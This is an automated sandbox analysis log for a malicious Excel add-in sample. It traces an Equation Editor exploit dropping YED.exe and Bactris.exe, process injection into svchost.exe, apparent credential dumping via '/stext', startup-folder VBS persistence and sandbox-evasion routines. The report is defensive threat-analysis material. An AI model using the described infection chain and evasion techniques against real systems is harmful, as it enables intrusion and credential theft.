Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exe
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\YED.exe	Process created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exe
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 202404294766578200.xlam.xlsx	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 202404294766578200.xlam.xlsx	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_1564_1766989274	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: 202404294766578200.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_002142DE

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_3_029EFE76 push ecx; ret	3_3_029EFE89
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00230A76 push ecx; ret	3_2_00230A89
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010A0A76 push ecx; ret	16_2_010A0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00457106 push ecx; ret	17_2_00457119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0045B11A push esp; ret	17_2_0045B141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0045E54D push esi; ret	17_2_0045E556
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00457A28 push eax; ret	17_2_00457A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00434E56 push ecx; ret	17_2_00434E69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10002806 push ecx; ret	17_2_10002819

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

17_2_00406EB0

Source: C:\Users\user\AppData\Roaming\YED.exe	File created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\YED.exe			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_0041AA4A

Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_0109F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		16_2_0109F98E
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01111C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		16_2_01111C41

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

17_2_0041CB50

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_0040F7A7 Sleep,ExitProcess,

17_2_0040F7A7

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\YED.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_3-70888
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Windows\SysWOW64\svchost.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

17_2_0041A748

Source: C:\Windows\SysWOW64\svchost.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\AppData\Roaming\YED.exe	API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	API coverage: 4.6 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 808	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3596	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3920	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	3_2_0027DBBE
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0024C2A2 FindFirstFileExW,	3_2_0024C2A2
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002868EE FindFirstFileW,FindClose,	3_2_002868EE
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0028698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	3_2_0028698F
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0027D076
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0027D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_0027D3A9
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_00289642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00289642
Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0028979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0028979D
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	16_2_010EDBBE
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010BC2A2 FindFirstFileExW,	16_2_010BC2A2
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	16_2_010F698F
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F68EE FindFirstFileW,FindClose,	16_2_010F68EE
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_010ED076
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_010ED3A9
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_010F979D
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_010F9642
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	16_2_010F9B2B
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010F5C97 FindFirstFileW,FindNextFileW,FindClose,	16_2_010F5C97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0044E879 FindFirstFileExA,	17_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040783C FindFirstFileW,FindNextFileW,	17_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	17_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_10006580 FindFirstFileExA,	17_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

